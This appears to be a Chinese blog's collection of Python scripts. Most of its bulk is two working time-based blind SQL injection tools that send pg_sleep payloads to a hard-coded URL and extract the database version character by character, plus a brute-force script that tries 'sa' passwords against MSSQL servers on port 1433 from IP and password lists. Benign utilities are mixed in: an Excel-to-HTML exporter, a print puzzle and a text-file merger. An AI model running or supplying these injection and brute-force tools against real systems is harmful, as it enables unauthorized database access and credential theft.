
手工注入辅助脚本

注入命令构造辅助脚本

此脚本示例用于延时注入的构造，相对于 HACKBAR 就不需要用鼠标去点 EXECUTE 了，能提升不少效率。

#!/usr/bin/env python
#coding=utf8
import requests
#from bs4 import *  # 页面分析用
import sys
# Python 2 only: reload() re-exposes sys.setdefaultencoding, which the stock
# interpreter removes after start-up (neither call exists in Python 3).
reload(sys)
sys.setdefaultencoding("utf-8")

def URLConnect(sqlid):
    """Issue one GET request with ``sqlid`` appended to the fixed query string.

    Args:
        sqlid: value of the ``propertyType`` parameter; coerced with str() and
            concatenated as-is (no URL-encoding is applied here).

    Returns:
        The ``requests`` Response object; the caller reads ``.elapsed``.

    The request carries a fixed header set, including a literal Cookie value
    and a Host header matching the hard-coded URL.
    """
    #proxy = "http://127.0.0.1:8080"
    #proxyDict = {'http':proxy}
    sqlid = str(sqlid)
    postHeader = {"Host":"www.baidu.com",
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"zh,zh-hk;q=0.8,en-us;q=0.5,en;q=0.3",
        "Accept-Encoding":"gzip, deflate",
        "Proxy-Connection":"keep-alive",
        "Cookie":"session-data=AAAAAAAaaAAAAAAAAAA==;",
        "Cache-Control":"max-age=0"}
    url = "https://www.baidu.com/ranTest/searchIndex?propertyType=" + sqlid
    docs = requests.get(url,headers=postHeader)
    return docs

def main():
    """Interactive loop around URLConnect() for the time-based (pg_sleep) probe.

    Each line read from stdin is appended to the fixed prefix, terminated with
    ``;--``, sent once, and the response's elapsed time is printed.  Entering
    ``exit`` leaves the loop.  Python 2 (raw_input, print statement).
    """
    #payload = "';select%20pg_sleep(3) where 1=1 and char_length(version()) > 1;--"
    payload = "';select%20pg_sleep(3) where 1=1 and "
    while 1:
        com = raw_input("com: ")
        if com != 'exit':
            t = payload + com + ';--'
            print 'payload: '+t
            docsGroup = URLConnect(t)
            # soup = BeautifulSoup(docsGroup.content,from_encoding='utf8')
            # print soup.get_text()
            # elapsed is a datetime.timedelta measured by requests.
            print docsGroup.elapsed
            print '\n'
        else:
            exit()

# Script entry point.
if __name__ == '__main__':
    main()

使用效果
构造脚本使用效果

手工注入爆破辅助脚本

用以爆破字段之类的

#!/usr/bin/env python
#coding=utf8
import requests
#from bs4 import *
import sys
# Python 2 only: reload() re-exposes sys.setdefaultencoding, which the stock
# interpreter removes after start-up (neither call exists in Python 3).
reload(sys)
sys.setdefaultencoding("utf-8")

def URLConnect(sqlid):
    """Issue one GET request with ``sqlid`` appended to the fixed query string.

    Args:
        sqlid: value of the ``propertyType`` parameter; coerced with str() and
            concatenated as-is (no URL-encoding is applied here).

    Returns:
        The ``requests`` Response object; the caller reads ``.elapsed``.

    The request carries a fixed header set, including a literal Cookie value
    and a Host header matching the hard-coded URL.
    """
    #proxy = "http://127.0.0.1:8080"
    #proxyDict = {'http':proxy}
    sqlid = str(sqlid)
    postHeader = {"Host":"www.baidu.com",
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"zh,zh-hk;q=0.8,en-us;q=0.5,en;q=0.3",
        "Accept-Encoding":"gzip, deflate",
        "Proxy-Connection":"keep-alive",
        "Cookie":"session-data=AAAAAAAaaAAAAAAAAAA==;",
        "Cache-Control":"max-age=0"}
    url = "https://www.baidu.com/ranTest/searchIndex?propertyType=" + sqlid
    docs = requests.get(url,headers=postHeader)
    return docs

def main():
    """Character-at-a-time loop over the time-based probe in URLConnect().

    For each of 103 positions (the length is noted as already known) the
    byte values 0..127 are tried in turn; a value is kept when the response's
    elapsed time shows two seconds, and the string collected so far is
    printed after every hit.  Python 2 (print statement).
    """
    #payload = "';select%20pg_sleep(3) where 1=1 and char_length(version()) > 1;--" # version string
    #payload = "';select%20pg_sleep(3) where 1=1 and length(version()) = 103;--" # length of the version string
    #payload = "';select%20pg_sleep(3) where 1=1 and left(version(),1) = chr(80);--" # guess one character
    strs = ""
    i = 0
    while i < 103:  # known data length
        t = 0
        while t < 128:  # guess the character at this position
            payload = "';select%20pg_sleep(2) where 1=1 and substr(version(),"+str(i+1)+",1) = chr("+str(t)+");--"
            #print payload
            docsGroup = URLConnect(payload)
            timec = docsGroup.elapsed #0:00:03.093413
            # str(timedelta) reads "H:MM:SS.ffffff"; [5:7] is the SS field.
            timec = str(timec)[5:7]
            if timec == "02":
                strs = strs + chr(t)
                print strs
                break
            t = t + 1
        i = i + 1

# Script entry point.
if __name__ == '__main__':
    main()

使用效果
爆破脚本使用效果

[python] excel 文档解析导出 html

因为 excel 默认情况下对于长文本显示不太友好.
提取第一行的内容作为 key, 将余下的内容分别对应到每一列的 key 然后导出为 html 的表格.

效果图如下:
效果图
代码如下:

#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# author: help@sys7em.info
# description: excel 文档解析, 生成友好的需求文件
import os,sys;
import xlrd;
import time,re;
# Python 2 only: reload() re-exposes sys.setdefaultencoding, which the stock
# interpreter removes after start-up (neither call exists in Python 3).
reload(sys)
sys.setdefaultencoding('utf-8')

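def _cell_text(value, encoding):
    """Return ``value`` as text.

    Byte strings are decoded with ``encoding`` (under Python 2 export() stores
    gb2312-encoded keys and cell values); anything else is formatted with
    ``%s``, which gives the same result as str() for numbers.
    """
    if isinstance(value, bytes):
        return value.decode(encoding, 'replace')
    return u'%s' % (value,)


def saveFile(i, file=False, Data=False):
    """Render one sheet as an HTML file next to the source workbook.

    Args:
        i: sheet name; becomes the table heading and part of the output name.
        file: path of the workbook; the output is written to
            ``<file stem>-<sheet>.<timestamp>.html``.
        Data: list of dicts, one per row, mapping header-row key -> cell value.

    Exits with status 0 (as export() does) when an argument is missing or the
    output file cannot be opened.  Keys and values are HTML-escaped because
    spreadsheet content is data, not markup; a ``\\r\\n`` inside a value is
    rendered as ``<br>`` after escaping.
    """
    if file is False or Data is False:
        print('[!] Error: file or data is not found')
        sys.exit(0)
    # html.escape is Python 3; cgi.escape is its Python 2 counterpart.
    try:
        from html import escape
    except ImportError:
        from cgi import escape
    encoding = 'gb2312'
    # Python 2: the sheet name is unicode and must be encoded to join it with
    # the byte-string path; Python 3: str already is text.
    label = i.encode(encoding) if str is bytes else i
    path = os.path.splitext(file)[0] + '-' + label
    path = path + time.strftime(".%Y.%m.%d.%H.%M.%S.html", time.localtime())
    parts = [
        u'<html><head><meta charset="GB2312"></head><body bgcolor="#f4f4f4">'
        u'<center><div><table width="860" border="3" style="background-color:#fff"'
        u' bordercolor="#336699" cellspacing="3" cellpadding="10" align="CENTER">'
        u'<thead><tr><th>' + escape(_cell_text(i, encoding)) + u'</th></tr></thead><tbody>'
    ]
    for rowData in Data:
        parts.append(u'<tr><td><table cellpadding="5">')
        for key, value in rowData.items():
            text = escape(_cell_text(value, encoding)).replace(u'\r\n', u'<br>')
            parts.append(u'<tr><td width="15%">' + escape(_cell_text(key, encoding)) + u':</td>')
            parts.append(u'<td width="85%" style="word-wrap:break-word;word-break:break-all;">'
                         + text + u'</td></tr>')
        # The cell closes before the row (previously written as </tr></td>).
        parts.append(u'</table></td></tr>')
    parts.append(u'</tbody></table></div></center></body></html>')
    try:
        out = open(path, 'wb')
    except (IOError, OSError) as e:
        print('[!] Error')
        print(e)
        sys.exit(0)
    with out:
        # Binary write keeps the bytes consistent with the declared GB2312
        # charset on both Python versions.
        out.write(u''.join(parts).encode(encoding, 'replace'))
    print('[+] Exported => ' + path)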
    
def export(file=False, count=False):
    """Parse every sheet of workbook ``file`` and hand its rows to saveFile().

    Row ``count`` (1-based) supplies the column keys; every later row becomes a
    dict keyed by those names.  Text cells are stored gb2312-encoded; cells
    whose value has no usable .encode() (numbers) are stored unchanged.
    Exits with status 0 on missing arguments or when xlrd cannot open the file.
    """
    if file == False or count == False:
        print('[!] Error: args is Fail')
        sys.exit(0)
    try:
        data = xlrd.open_workbook(file)
    except Exception as e:
        print('[!] Error')
        print(str(e))
        sys.exit(0)
    for sheetName in data.sheet_names():
        print('[+] ==== ' + sheetName + '====')
        sheet = data.sheet_by_name(sheetName)
        print('[+] rows => ' + str(sheet.nrows))
        print('[+] cols => ' + str(sheet.ncols))
        print('[+] count => ' + str(count))
        # Header row -> one key per column.
        keys = [str(sheet.cell(count - 1, col).value).encode('gb2312')
                for col in range(sheet.ncols)]
        # Remaining rows -> {key: value}.
        rows = []
        for row in range(count, sheet.nrows):
            current = {}
            for col, key in enumerate(keys):
                cell = sheet.cell(row, col).value
                try:
                    current[key] = cell.encode('gb2312')
                except Exception:
                    current[key] = cell
            rows.append(current)
        saveFile(sheetName, file, rows)
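def init(fileName, count):
    """Validate the workbook path, then run export().

    Args:
        fileName: workbook name, resolved against the current working
            directory with os.path.join (an absolute path passes through
            unchanged; the previous ``cwd + "\\\\" + name`` only worked on
            Windows).
        count: header row number; converted with int().

    Exits when the file does not exist or its extension does not look like
    an Excel workbook (``xls``, ``xlsx``, ... — compared case-insensitively).
    """
    targetFile = os.path.join(os.getcwd(), fileName)
    print('[+] Check File...')
    if not os.path.isfile(targetFile):
        print('[!] Error: is no file ' + targetFile)
        sys.exit()
    if 'xls' not in os.path.splitext(targetFile)[1].lower():
        print('[!] Error: is no file')
        sys.exit()
    print('[+] exporting..')
    export(targetFile, int(count))
    print('[+] Done.')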
    
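def main():
    """Command-line entry point: ``python split.py <file.xls> [count]``.

    One positional argument exports with the header row at 1; a second one
    selects the header row.  Any other number of arguments prints the usage
    text and exits.  Counting ``sys.argv[1:]`` makes the arity match the
    usage text (the check previously required one extra argument).
    """
    args = sys.argv[1:]
    if len(args) == 1:
        init(args[0], 1)
    elif len(args) == 2:
        init(args[0], args[1])
    else:
        print('informationSplit.py')
        print('Author: help@sys7em.info')
        print('Descript: Excel 信息提取工具')
        print('Usage: python split.py <a.xls>(string:file name) [count](int:title row,default: 1)')
        sys.exit()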
# Script entry point.
if __name__ == '__main__':
    main()

一个有趣的 Python 语句

朋友给了一个需求, 要在一条语句内打印出下表

Oa:mmm
Ob:zzz
Oc:kkk
Od:qqq
Oe:lll

最终代码,利用了 Py 的可读 index 和 ASCII 码表组合完成了要求

#!/usr/bin/env python
# One row per offset: the row letter walks a, b, c, ... and the repeated
# character is that letter's code point shifted by the offset.
offsets = [12, 24, 8, 13, 7]
for index, i in enumerate(offsets):
    j = ord("a") + index       # code point of the row letter
    triple = chr(j + i) * 3    # shifted character, repeated three times
    print("O" + chr(j) + ":" + triple)

Python 小工具

#/usr/bin/env python
#encoding=utf-8
'''
	Power By A.tm.k
	2015-8-7
	将两个文本合并为一个文本
	a.txt + a1.txt > a.txt
'''
import os,sys

def getdir():
	"""Return the names of the ``*.txt`` files in the current working directory.

	A name qualifies when the part after its last dot is exactly ``txt``
	(``a.TXT`` is skipped); order is that of os.listdir().
	"""
	return [name for name in os.listdir(os.getcwd()) if name.split('.')[-1] == 'txt']
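def _prompt(text):
	"""Read one line from stdin: raw_input on Python 2, input on Python 3."""
	try:
		return raw_input(text)
	except NameError:
		return input(text)


def _merge_files(first, second):
	"""Combine ``first`` and ``second`` into ``second`` and delete ``first``.

	The result holds every distinct stripped line of both files, in order of
	first appearance, one per line.
	"""
	merged = []
	seen = set()
	for name in (first, second):
		with open(name) as handle:
			for line in handle:
				entry = line.strip() + '\n'
				if entry not in seen:
					seen.add(entry)
					merged.append(entry)
	# Written to a scratch file first so a failure mid-way never truncates an
	# input; mode 'w' (not 'a') so a stale temp.txt cannot leak into the result.
	with open('temp.txt', 'w') as out:
		out.writelines(merged)
	os.remove(first)
	os.remove(second)
	os.rename('temp.txt', second)


def code(fils, answer=None):
	"""Merge neighbouring files whose names share the same first three characters.

	Prints the three-character prefix of every name, asks for confirmation
	(``answer`` supplies the reply without prompting; n/N exits, anything but
	y/Y does nothing), then walks ``fils`` pairwise: when fils[k] and fils[k+1]
	share a prefix their lines are merged into fils[k+1] and fils[k] is removed.
	``fils`` itself is not modified.
	"""
	for name in fils:
		print(name[0:3])
	if answer is None:
		answer = _prompt("Check File Name, Do You Want Continue? (Y)es or (N)o:")
	if answer in ('N', 'n'):
		sys.exit()
	if answer not in ('Y', 'y'):
		return
	# The last entry has no successor, so it is only ever a merge target.
	for current, following in zip(fils, fils[1:]):
		if current[0:3] == following[0:3]:
			_merge_files(current, following)
			print("[+]" + current + "<---->" + following + "=======>" + following + " DONE")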

# Script entry point: list the *.txt files in the working directory, then
# merge the same-prefix neighbours.
if __name__ == '__main__':
	f = getdir()
	code(f);

文件: total.zip 大小: 811 字节
修改时间: 2015年8月7日, 20:00:55
MD5: EA6C5FFB6F70E87C62D5550C180D9DBF
SHA1: 4117AFCE2299E1E3BC3A82999594D25B84FF4ACC
CRC32: 9DEF9657

1433 爆破脚本

#/use/bin/env python
#encoding=utf-8
'''
	Power By A.tm.k From http://sys7em.info/
	Brute Microsoft SQL Server Script
	Microsoft SQL Server 数据库爆破脚本
'''
from __future__ import division
import sys,time
import _mssql
import socket
# Python 2 only: reload() re-exposes sys.setdefaultencoding, which the stock
# interpreter removes after start-up (neither call exists in Python 3).
reload(sys)
sys.setdefaultencoding('gbk')
def connect(host='127.0.0.1',pwd='123456'):
	"""Try one ``sa`` login to the ``master`` database on ``host`` via _mssql.

	Returns True when the connection opens (it is closed immediately), False
	on any exception; the reason is not reported.
	"""
	try:
		conn = _mssql.connect(server=host,user='sa',password=pwd,database='master');
		conn.close()
		return True;
	except Exception, e:
		return False;
def check(host='127.0.0.1'):
	"""Return True when a TCP connection to ``host``:1433 succeeds, else False.

	Also sets the process-wide default socket timeout to 5 seconds, which
	applies to sockets created after this call.
	"""
	sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
	socket.setdefaulttimeout(5);
	try:
		sock.connect((host,1433))
		sock.close();
		return True;
	except Exception, e:
		sock.close();
		return False;
def usage():
	"""Print the banner: author, date and the two invocation forms, each
	centred inside a 50-column box (integer division from ``__future__``)."""
	t = 'Power By A.tm.k';
	m = '2015-8-3';
	r = 'Usage: brute.py -l ip.txt pass.txt';
	r1 = 'or: brute.py -i 127.0.0.1 pass.txt';
	i = '-';
	print "*"+i*50+"*";
	print "+"+' '*int(((50-len(t))/2))+t+' '*int(((50-len(t))/2))+' +';
	print "+"+' '*int(((50-len(m))/2))+m+' '*int(((50-len(m))/2))+'+';
	print "="+i*50+"=";
	print "+"+' '*int(((50-len(r))/2))+r+' '*int(((50-len(r))/2))+'+';
	print "+"+' '*int(((50-len(r1))/2))+r1+' '*int(((50-len(r1))/2))+'+';
	print "*"+i*50+"*";
def brute(argv='-i',ip='127.0.0.1',pwd='admin'):
	"""Dispatch on ``argv``: ``-i`` works on one host, ``-l`` on a host list.

	-i: ``ip`` is a host; when check() reports it up, every line of the
	    password file ``pwd`` is passed to connect() and hits are printed.
	-l: ``ip`` is a file of hosts; those passing check() are tried against
	    the password file, and hits are appended to ok.txt in the working
	    directory.
	Any other value prints "argv Not Found".
	"""
	oklist = []
	ips = []
	if argv == '-i':
		print 'Checking host...'
		if check(host=ip):
			print 'Host Up';
			print 'Start Brute';
			try:
				pwd_list = open(pwd);
			except Exception, e:
				print "Password File Fail";
			for x in pwd_list.readlines():
				if connect(host=ip,pwd=x.strip()):
					print 'Brute Dong: pass is -&gt; '+x
			pwd_list.close()
			print "Stop Brute"
		else:
			print 'Host Down';
			print 'Stop Brute';
	elif argv == '-l':
		try:
			ip_list = open(ip)
		except Exception, e:
			print 'IP LIST Fail';
		try:
			pwd_list = open(pwd);
		except Exception, e:
			print 'Password File Fail'
		print "Checking host..."
		for i in ip_list.readlines():
			if check(host=i):
				ips.append(i.strip())
		for i in set(ips):
			for p in pwd_list.readlines():
				if connect(host=i.strip(),pwd=p.strip()):
					tmp = 'IP: '+i+" : "+p
					oklist.append(tmp)
		ok = open('ok.txt','a')
		for i in oklist:
			ok.write(i)
		ok.close()
		pwd_list.close()
		ip_list.close()
	else:
		print "argv Not Found"
def main():
	"""Command-line entry point: fewer than four argv entries prints the
	banner, exactly four calls brute(mode, target, password file), more
	prints "argv overflow"."""
	if len(sys.argv) &lt;= 3:
		usage();
	elif len(sys.argv) == 4:
		brute(argv=sys.argv[1],ip=sys.argv[2],pwd=sys.argv[3])
	else:
		print "argv overflow"
# Script entry point.
if __name__ == '__main__':
	main()

brute.zip 需要安装 _mssql 模块 或者使用 pymssql 套结替换代码中的 conn 验证串
文件: brute.py
大小: 2587 字节
修改时间: 2015年8月3日, 22:44:43
MD5: 9C3A0B6148640A66F5CDDA4368289D7F
SHA1: C9350426EACA0D699F1751144E8FA226ACD3027C
CRC32: 165E953D